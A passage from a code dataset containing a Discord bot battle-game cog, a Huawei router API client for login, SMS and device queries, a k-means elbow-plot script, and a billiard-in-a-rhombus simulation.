else:\r\n pass\r\n points1 = 0\r\n points2 = 0\r\n await asyncio.sleep(3)\r\n await self.bot.say(\"Our Champion in this battle is a \" + Fighter1RoleName + \" rank fighter from \" + Fighter1NationName + \"!\") \r\n await asyncio.sleep(4)\r\n await self.bot.say(\"The Challenger is a \" + Fighter2RoleName + \" rank fighter from \" + Fighter2NationName + \"!\")\r\n await asyncio.sleep(3)\r\n await self.bot.say(\"Good luck to the both of you!\")\r\n await asyncio.sleep(5)\r\n await self.bot.say(author.name + \" walked in with their \" + Fighter1Weapon + \" looking confident.\")\r\n await asyncio.sleep(3)\r\n await self.bot.say(author2.name + \" came in holding their \" + Fighter2Weapon + \" looking equally confident.\") \r\n await asyncio.sleep(5)\r\n lst = ['...'] * 8 \r\n Roll1 = randint(0, 10)\r\n Roll2 = randint(0, 10)\r\n while True:\r\n Roll1 = randint(0, 300) + (Fighter1Role * 10)\r\n if Roll1 == Roll2:\r\n pass\r\n elif Roll1 > Roll2:\r\n #Add Player 1 start\r\n lst[0] = self.randomStart(author.name)\r\n lst[1] = self.randomStartResponse(author2.name)\r\n break\r\n elif Roll2 > Roll1:\r\n #Add PLayer 2 start\r\n lst[0] = self.randomStart(author2.name)\r\n lst[1] = self.randomStartResponse(author.name)\r\n break\r\n else:\r\n pass\r\n else:\r\n pass\r\n Fighter1Bonus = Fighter1Role * 100\r\n Fighter2Bonus = Fighter2Role * 100\r\n Fighter1Hit = 100 + (Fighter1Bonus / 2) - (Fighter2Bonus / 10)\r\n Fighter2Hit = 100 + (Fighter2Bonus / 2) - (Fighter1Bonus / 10)\r\n for i in range(5):\r\n Roll1 = randint(0, 1001)\r\n Roll2 = randint(0, 1001)\r\n if Roll1 > 0 and Roll1 < Fighter1Hit:\r\n #Player 1 lands a hit and Player 2 suffers.\r\n msg = self.goodFight(author.name, author2.name, Fighter1Weapon, Fighter2Weapon)\r\n points1 = points1 + 1\r\n elif Roll1 > Fighter1Hit and Roll1 < Fighter1Bonus:\r\n msg = self.midFight(author.name, author2.name, Fighter1Weapon, Fighter2Weapon)\r\n else:\r\n #bad message\r\n msg = self.badFight(author.name, author2.name, Fighter1Weapon, Fighter2Weapon)\r\n points2 = points2 + 1\r\n lst[i + 2] = msg\r\n #Next Player\r\n if Roll1 > 0 and Roll1 < Fighter2Hit:\r\n #Player 1 lands a hit and Player 2 suffers.\r\n msg2 = self.goodFight(author2.name, author.name, Fighter2Weapon, Fighter1Weapon)\r\n points2 = points2 + 1\r\n elif Roll1 > Fighter2Hit and Roll1 < Fighter2Bonus:\r\n msg2 = self.midFight(author2.name, author.name, Fighter2Weapon, Fighter1Weapon)\r\n else:\r\n #bad message\r\n msg2 = self.badFight(author2.name, author.name, Fighter2Weapon, Fighter1Weapon)\r\n points1 = points1 + 1\r\n lst[i + 3] = msg2\r\n for i in range(8): \r\n await self.bot.say(lst[i]) \r\n await asyncio.sleep(4)\r\n #Tally result\r\n prize = bet * 2\r\n while True:\r\n if points1 > points2:\r\n if abs(points1-points2):\r\n await self.bot.say(\"As the battle drew near \" + author2.name + \" took their final breath and collapsed.\")\r\n await self.bot.say(\"It seems like they died.\")\r\n if author.id == '159043902383456257':\r\n await self.bot.say(\"As expected of Ainz-Sama!\")\r\n await asyncio.sleep(3)\r\n elif author2.id == '159043902383456257':\r\n await self.bot.say(\"I find it hard to understand why Ainz-Sama let you win! He even took lot's of damage right now.\")\r\n await asyncio.sleep(3)\r\n await self.bot.say(\"No there must be a reason behind it....Ahh it was a lesson for you after all!\")\r\n await asyncio.sleep(3)\r\n await self.bot.say(\"As expected of Ainz-Sama!\")\r\n await asyncio.sleep(3) \r\n elif Fighter1Role == 100:\r\n await self.bot.say(\"As expected from a servant of Ainz-Sama!\")\r\n await asyncio.sleep(3)\r\n elif Fighter2Role == 100:\r\n await self.bot.say(\"It's utterly disgraceful that a servant of Ainz-Sama could fail like this!\")\r\n await asyncio.sleep(3)\r\n await self.bot.say(\"I'll have to question whether you should be allowed to stay within Nazarick or not.\")\r\n await asyncio.sleep(3)\r\n else:\r\n pass\r\n await self.bot.say(author2.name + \" is fortunate that Ainz-Sama used revival magic on them.\")\r\n await asyncio.sleep(3)\r\n bank.deposit_gold(author, prize)\r\n if author.id == '159043902383456257':\r\n await self.bot.say(\"The winner is \" + author.mention + \"-Sama! Here is \" + str(prize) + \" Gold!\")\r\n else:\r\n await self.bot.say(\"The winner is \" + author.mention + \"! They won \" + str(prize) + \" Gold!\")\r\n return\r\n else:\r\n await self.bot.say(\"The battle drew to a close and \" + author2.name + \"fainted.\")\r\n await asyncio.sleep(3)\r\n await self.bot.say(\"They lost to the opponent.\")\r\n await asyncio.sleep(3)\r\n if author.id == '159043902383456257':\r\n await self.bot.say(\"As expected of Ainz-Sama!\")\r\n await asyncio.sleep(3)\r\n elif author2.id == '159043902383456257':\r\n await self.bot.say(\"I find it hard to understand why Ainz-Sama let you win! He even took lot's of damage right now.\")\r\n await asyncio.sleep(3)\r\n await self.bot.say(\"No there must be a reason behind it....Ahh it was a lesson for you after all!\")\r\n await asyncio.sleep(3)\r\n await self.bot.say(\"As expected of Ainz-Sama!\")\r\n await asyncio.sleep(3) \r\n elif Fighter1Role == 100:\r\n await self.bot.say(\"As expected from a servant of Ainz-Sama!\")\r\n await asyncio.sleep(3)\r\n elif Fighter2Role == 100:\r\n await self.bot.say(\"It's utterly disgraceful that a servant of Ainz-Sama could fail like this!\")\r\n await asyncio.sleep(3)\r\n await self.bot.say(\"I'll have to question whether you should be allowed to stay within Nazarick or not.\")\r\n await asyncio.sleep(3)\r\n else:\r\n pass\r\n bank.deposit_gold(author, prize)\r\n if author.id == '159043902383456257':\r\n await self.bot.say(\"The winner is \" + author.mention + \"-Sama! Here is \" + str(prize) + \" Gold!\")\r\n else:\r\n await self.bot.say(\"The winner is \" + author.mention + \"! They won \" + str(prize) + \" Gold!\")\r\n return\r\n elif points2 > points1:\r\n if abs(points1-points2):\r\n await self.bot.say(\"As the battle drew near \" + author.name + \" took their final breath and collapsed.\")\r\n await asyncio.sleep(3)\r\n await self.bot.say(\"It seems like they died.\")\r\n await asyncio.sleep(3)\r\n if author2.id == '159043902383456257':\r\n await self.bot.say(\"As expected of Ainz-Sama!\")\r\n await asyncio.sleep(3)\r\n elif author.id == '159043902383456257':\r\n await self.bot.say(\"I find it hard to understand why Ainz-Sama let you win! He even took lot's of damage right now.\")\r\n await asyncio.sleep(3)\r\n await self.bot.say(\"No there must be a reason behind it....Ahh it was a lesson for you after all!\")\r\n await asyncio.sleep(3)\r\n await self.bot.say(\"As expected of Ainz-Sama!\")\r\n await asyncio.sleep(3) \r\n elif Fighter2Role == 100:\r\n await self.bot.say(\"As expected from a servant of Ainz-Sama!\")\r\n await asyncio.sleep(3)\r\n elif Fighter1Role == 100:\r\n await self.bot.say(\"It's utterly disgraceful that a servant of Ainz-Sama could fail like this!\")\r\n await asyncio.sleep(3)\r\n await self.bot.say(\"I'll have to question whether you should be allowed to stay within Nazarick or not.\")\r\n await asyncio.sleep(3)\r\n else:\r\n pass\r\n bank.deposit_gold(author2, prize)\r\n await self.bot.say(\"The winner is \" + author2.mention + \"! They won \" + str(prize) + \" Gold!\")\r\n return\r\n else:\r\n await self.bot.say(\"The battle drew to a close and \" + author.name + \"fainted.\")\r\n await asyncio.sleep(3)\r\n await self.bot.say(\"They lost to the opponent.\")\r\n await asyncio.sleep(3)\r\n if author2.id == '159043902383456257':\r\n await self.bot.say(\"As expected of Ainz-Sama!\")\r\n await asyncio.sleep(3)\r\n elif author.id == '159043902383456257':\r\n await self.bot.say(\"I find it hard to understand why Ainz-Sama let you win! He even took lot's of damage right now.\")\r\n await asyncio.sleep(3)\r\n await self.bot.say(\"No there must be a reason behind it....Ahh it was a lesson for you after all!\")\r\n await asyncio.sleep(3)\r\n await self.bot.say(\"As expected of Ainz-Sama!\")\r\n await asyncio.sleep(3) \r\n elif Fighter2Role == 100:\r\n await self.bot.say(\"As expected from a servant of Ainz-Sama!\")\r\n await asyncio.sleep(3)\r\n elif Fighter1Role == 100:\r\n await self.bot.say(\"It's utterly disgraceful that a servant of Ainz-Sama could fail like this!\")\r\n await asyncio.sleep(3)\r\n await self.bot.say(\"I'll have to question whether you should be allowed to stay within Nazarick or not.\")\r\n await asyncio.sleep(3)\r\n else:\r\n pass\r\n bank.deposit_gold(author2, prize)\r\n await self.bot.say(\"The winner is \" + author2.mention + \"! They won \" + str(prize) + \" Gold!\")\r\n return\r\n else:\r\n final = randint(1,2)\r\n if final == 1:\r\n points1 = points1 + 1\r\n else:\r\n points2 = points2 + 1\r\n \r\n \r\n \r\n @pvp.error\r\n async def pvp_error(self, error, ctx):\r\n if isinstance(error, commands.CommandOnCooldown):\r\n await self.bot.say(error) \r\n \r\ndef setup(bot):\r\n n = Arena(bot)\r\n bot.add_cog(n) ", "sub_path": "arena.py", "file_name": "arena.py", "file_ext": "py", "file_size_in_byte": 25778, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "discord.User", "line_number": 32, "usage_type": "attribute"}, {"api_name": "discord.User", "line_number": 85, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 114, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 123, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 135, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 147, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 157, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 176, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 191, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 206, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 221, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 236, "usage_type": "call"}, {"api_name": "time.time", "line_number": 263, "usage_type": "call"}, {"api_name": "time.time", "line_number": 264, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 293, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 314, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 316, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 318, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 320, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 322, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 324, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 326, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 327, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 329, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 351, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 352, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 378, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 388, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 391, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 393, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 395, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 398, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 401, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 403, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 407, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 416, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 418, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 421, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 424, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 426, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 428, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 431, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 434, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 436, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 448, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 450, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 453, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 456, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 458, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 460, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 463, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 466, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 468, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 476, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 478, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 481, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 484, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 486, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 488, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 491, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 494, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 496, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 503, "usage_type": "call"}, {"api_name": "discord.ext.commands.cooldown", "line_number": 239, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 239, "usage_type": "name"}, {"api_name": "discord.ext.commands.BucketType", "line_number": 239, "usage_type": "attribute"}, {"api_name": "discord.ext.commands.command", "line_number": 240, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 240, "usage_type": "name"}, {"api_name": "discord.ext.commands.CommandOnCooldown", "line_number": 513, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 513, "usage_type": "name"}]}
+{"seq_id": "640679409", "text": "#!/usr/bin/env python2\n#\n# coding: utf-8\n#\n\nimport requests\nimport xmltodict\nimport uuid\nimport hashlib\nimport hmac\nimport logging\nfrom binascii import hexlify\nfrom collections import OrderedDict\nfrom datetime import datetime\n\n\nclass HuaweiAPIException(Exception):\n def __init__(self, value):\n self.value = value\n\n def __str__(self):\n return repr(self.value)\n\n\nclass HuaweiAPI:\n HOME_URL = \"http://{host}/html/home.html\"\n API_URL = \"http://{host}/api/\"\n\n def __init__(self, passwd, host=\"192.168.8.1\", user=\"admin\", logfile=None):\n if logfile:\n logging.basicConfig(filename=logfile)\n stderrLogger = logging.StreamHandler()\n stderrLogger.setFormatter(logging.Formatter(logging.BASIC_FORMAT))\n logging.getLogger().addHandler(stderrLogger)\n self.log = logging.getLogger(\"huawei-api\")\n self.api_url = self.API_URL.format(host=host)\n self.session = requests.Session()\n self.log.debug(\"Connect to {host}\".format(host=host))\n try:\n self.session.get(self.HOME_URL.format(host=host),\n timeout=(5.0, 5.0))\n except Exception as e:\n raise HuaweiAPIException(\"Connection failed: \" + str(e))\n dev_info = self.device_info()\n if dev_info:\n self.log.info(\"Detected Device: \" + dev_info['devicename'])\n self.log.debug(\"Authenticate for user \" + user)\n self.__login(user, passwd)\n\n def __get_client_proof(self, clientnonce, servernonce,\n password, salt, iterations):\n msg = \"%s,%s,%s\" % (clientnonce, servernonce, servernonce)\n salted_pass = hashlib.pbkdf2_hmac('sha256', password,\n bytearray.fromhex(salt), iterations)\n client_key = hmac.new(b'Client Key', msg=salted_pass,\n digestmod=hashlib.sha256)\n stored_key = hashlib.sha256()\n stored_key.update(client_key.digest())\n signature = hmac.new(msg.encode('utf_8'),\n msg=stored_key.digest(), digestmod=hashlib.sha256)\n client_key_digest = client_key.digest()\n signature_digest = signature.digest()\n client_proof = bytearray()\n i = 0\n while i < client_key.digest_size:\n val = ord(client_key_digest[i]) ^ ord(signature_digest[i])\n client_proof.append(val)\n i = i + 1\n return hexlify(client_proof)\n\n def __login(self, user, password):\n d = OrderedDict()\n d['username'] = user\n client_nonce = uuid.uuid4().hex + uuid.uuid4().hex\n d['firstnonce'] = client_nonce\n d['mode'] = 1\n data_login = self.__api_post('user/challenge_login', d)\n d = OrderedDict()\n proof = self.__get_client_proof(client_nonce,\n data_login['servernonce'],\n password,\n data_login['salt'],\n int(data_login['iterations']))\n d['clientproof'] = proof\n d['finalnonce'] = data_login['servernonce']\n self.__api_post('user/authentication_login', d)\n if self.__api_request('user/state-login'):\n return True\n return False\n\n def __get_token(self, session=True):\n api_method_url = 'webserver/SesTokInfo'\n if session:\n r = self.session.get(url=self.api_url + api_method_url,\n allow_redirects=False, timeout=(1.5, 1.5))\n else:\n r = requests.get(url=self.api_url + api_method_url,\n allow_redirects=False, timeout=(1.5, 1.5))\n if r.status_code != 200:\n raise HuaweiAPIException(\"Error getting token .HTTP error: %d\" %\n r.status_code)\n return xmltodict.parse(r.text)['response']['TokInfo']\n\n def __api_request(self, api_method_url, session=True):\n headers = {'__RequestVerificationToken': self.__get_token(session)}\n try:\n r = self.session.get(url=self.api_url + api_method_url,\n headers=headers,\n allow_redirects=False, timeout=(1.5, 1.5))\n except requests.exceptions.RequestException as e:\n raise HuaweiAPIException(\"Request %s failed: %s\" %\n (api_method_url, str(e)))\n if r.status_code != 200:\n raise HuaweiAPIException(\"Request returned HTTP error %d\" %\n r.status_code)\n self.log.debug(\"Request: \" + api_method_url +\n \"\\nResponse:\\n\" + r.content)\n resp = xmltodict.parse(r.text).get('error', None)\n if resp is not None:\n error_code = resp['code']\n raise HuaweiAPIException(\"Request returned error \" + error_code)\n resp = xmltodict.parse(r.text).get('response', None)\n if resp is None:\n raise HuaweiAPIException(\"Request returned empty response\")\n else:\n return resp\n\n def __api_post(self, api_method_url, data, session=True):\n headers = {'__RequestVerificationToken': self.__get_token(session)}\n request = {}\n request['request'] = data\n try:\n r = self.session.post(url=self.api_url + api_method_url,\n data=xmltodict.unparse(request, pretty=True),\n headers=headers, timeout=(1.5, 1.5))\n except requests.exceptions.RequestException as e:\n raise HuaweiAPIException(\"Request %s failed: %s\" %\n (api_method_url, str(e)))\n if r.status_code != 200:\n raise HuaweiAPIException(\"Request returned HTTP error %d\" %\n r.status_code)\n self.log.debug(\"Request: \" + api_method_url +\n \"\\nResponse:\\n\" + r.content)\n resp = xmltodict.parse(r.text).get('error', None)\n if resp is not None:\n error_code = resp['code']\n raise HuaweiAPIException(\"Request returned error \" + error_code)\n resp = xmltodict.parse(r.text).get('response', None)\n if resp is None:\n raise HuaweiAPIException(\"Request returned empty response\")\n else:\n return resp\n\n def send_sms(self, number, text):\n d = OrderedDict()\n d['Index'] = -1\n d['Phones'] = {'Phone': number}\n d['Sca'] = ''\n d['Content'] = text\n d['Length'] = len(text)\n d['Reserved'] = 1\n d['Date'] = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n self.__api_post('sms/send-sms', d)\n\n def device_info(self):\n return self.__api_request('device/basic_information', session=False)\n\n def state_login(self):\n return self.__api_request('user/state-login')\n\n def check_notifications(self):\n return self.__api_request('monitoring/check-notifications')\n\n def device_signal(self):\n return self.__api_request('device/signal')\n\n def net_mode(self, params=None):\n if params is None:\n return self.__api_request('net/net-mode')\n else:\n return self.__api_post('net/net-mode', params)\n\n def net_mode_list(self, params=None):\n if params is None:\n return self.__api_request('net/net-mode-list')\n else:\n return self.__api_post('net/net-mode-list', params)\n\n", "sub_path": "huawei_api.py", "file_name": "huawei_api.py", "file_ext": "py", "file_size_in_byte": 7518, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "logging.basicConfig", "line_number": 31, "usage_type": "call"}, {"api_name": "logging.StreamHandler", "line_number": 32, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 33, "usage_type": "call"}, {"api_name": "logging.BASIC_FORMAT", "line_number": 33, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 34, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 35, "usage_type": "call"}, {"api_name": "requests.Session", "line_number": 37, "usage_type": "call"}, {"api_name": "hashlib.pbkdf2_hmac", "line_number": 53, "usage_type": "call"}, {"api_name": "hmac.new", "line_number": 55, "usage_type": "call"}, {"api_name": "hashlib.sha256", "line_number": 56, "usage_type": "attribute"}, {"api_name": "hashlib.sha256", "line_number": 57, "usage_type": "call"}, {"api_name": "hmac.new", "line_number": 59, "usage_type": "call"}, {"api_name": "hashlib.sha256", "line_number": 60, "usage_type": "attribute"}, {"api_name": "binascii.hexlify", "line_number": 69, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 72, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 74, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 78, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 97, "usage_type": "call"}, {"api_name": "xmltodict.parse", "line_number": 102, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 110, "usage_type": "attribute"}, {"api_name": "xmltodict.parse", "line_number": 118, "usage_type": "call"}, {"api_name": "xmltodict.parse", "line_number": 122, "usage_type": "call"}, {"api_name": "xmltodict.unparse", "line_number": 134, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 136, "usage_type": "attribute"}, {"api_name": "xmltodict.parse", "line_number": 144, "usage_type": "call"}, {"api_name": "xmltodict.parse", "line_number": 148, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 155, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 162, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 162, "usage_type": "name"}]}
+{"seq_id": "56481994", "text": "import matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.cluster import KMeans\nfrom sklearn.datasets import load_digits\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import scale\n\nnp.random.seed(42)\n\ndigits = load_digits()\ndata = scale(digits.data)\n\nx = []\ny = []\n\nfor i in range(1, 20):\n reduced_data = PCA(n_components=2).fit_transform(data)\n # print(reduced_data)\n kmeans = KMeans(init='k-means++', n_clusters=i, n_init=10)\n kmeans.fit(reduced_data)\n\n # clusters centers\n centroids = kmeans.cluster_centers_\n error = kmeans.inertia_\n # print(centroids)\n print(error)\n x.append(i)\n y.append(error)\n\nplt.scatter(x, y)\nplt.plot(x, y, '-o')\nplt.show()\n", "sub_path": "assignment3/src/test-k-means-cost-function.py", "file_name": "test-k-means-cost-function.py", "file_ext": "py", "file_size_in_byte": 710, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "numpy.random.seed", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 8, "usage_type": "attribute"}, {"api_name": "sklearn.datasets.load_digits", "line_number": 10, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.scale", "line_number": 11, "usage_type": "call"}, {"api_name": "sklearn.decomposition.PCA", "line_number": 17, "usage_type": "call"}, {"api_name": "sklearn.cluster.KMeans", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}]}
+{"seq_id": "239951343", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\nThis is a temporary script file.\n\"\"\"\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom pylab import *\nx=[(2 + 2 ** 0.5) / 2.0]\ny=[(2 ** 0.5) / 2.0]\nvx, vy=0, 2\ntime,i,dt=0,0,0.001\nsdt=0.00001\nvelocity=[4]\nwhile time<=300:\n X = x[i] + vx * dt\n Y = y[i] + vy * dt\n if Y > 0 and Y < 2 ** 0.5:\n if X >= (2 + 2 ** 0.5) / 2.0:\n if Y > X - 2:\n x.append(X)\n y.append(Y)\n velocity.append(vx)\n else:\n x1 = x[i] + vx * sdt\n y1 = y[i] + vy * sdt\n if y1 > x1 - 2:\n x.append(x1)\n y.append(y1)\n velocity.append(vx)\n else:\n cash1 = vx \n cash2 = vy\n vx = cash2\n vy = cash1 \n x.append(x[i] + vx * sdt)\n y.append(y[i] + vy * sdt)\n velocity.append(vx)\n if X < (2 + 2 ** 0.5) / 2.0:\n if Y < X:\n x.append(X)\n y.append(Y)\n velocity.append(vx)\n else:\n x2 = x[i] + vx * sdt\n y2 = y[i] + vy*sdt\n if y2 < x2:\n x.append(x2)\n y.append(y2)\n velocity.append(vx)\n else:\n cash3 = vx\n cash4 = vy\n vx = cash4\n vy = cash3\n x.append(x[i]+vx*sdt)\n y.append(y[i]+vy*sdt)\n velocity.append(vx)\n if Y >= 2 ** 0.5:\n x4 = x[i] + vx * sdt\n y4 = y[i] + vy * sdt\n if y4 < 2 ** 0.5:\n x.append(x4)\n y.append(y4)\n velocity.append(vx)\n else: \n vy=-vy\n x.append(x[i]+vx*sdt)\n y.append(y[i]+vy*sdt)\n velocity.append(vx)\n if Y <= 0:\n x3=x[i]+vx*sdt\n y3=y[i]+vy*sdt\n if y3 > 0:\n x.append(x3)\n y.append(y3)\n velocity.append(vx)\n else: \n vy=-vy\n x.append(x[i]+vx*sdt)\n y.append(y[i]+vy*sdt)\n velocity.append(vx)\n time=time+dt\n i=i+1\nplt.figure(figsize=(16,5.5))\nsubplot(1,2,1)\nplt.title(\"vx0=0,vy0=2\")\nplt.xlabel(\"x\")\nplt.ylabel(\"y\")\nplt.xticks([0,0.5,1,1.5,2,2.5,3,3.5])\nplt.yticks([0,0.5,1,1.5])\nplt.xlim(0, 3.5)\nplt.ylim(0, 2)\nplt.plot([0, 2 ** 0.5],[0, 2 ** 0.5],color=\"blue\",label=\"rhombus\",linewidth=2)\nplt.plot([2 ** 0.5, 2 + 2 ** 0.5],[2 ** 0.5, 2 ** 0.5],color=\"blue\",linewidth=2)\nplt.plot([2 + 2 ** 0.5, 2],[2 ** 0.5, 0],color=\"blue\",linewidth=2)\nplt.plot([0, 2],[0, 0],color=\"blue\",linewidth=2)\nplt.plot(x,y,label=\"trajectory\",color=\"red\")\nplt.scatter((2 + 2 ** 0.5) / 2.0,(2 ** 0.5) / 2.0,color=\"black\",alpha=1,linewidth=4,label=\"initial\")\nplt.legend()\nsubplot(1,2,2)\nplt.xlabel(\"x\")\nplt.ylabel(\"vx\")\nfor i in range(1000):\n if 1000*i<=len(x):\n plt.scatter(x[1000*i],velocity[1000*i])\nplt.show()\n", "sub_path": "Materials 08.py", "file_name": "Materials 08.py", "file_ext": "py", "file_size_in_byte": 3115, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "matplotlib.pyplot.figure", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 91, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 91, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 94, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 95, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 96, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 97, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 102, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 103, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}]}
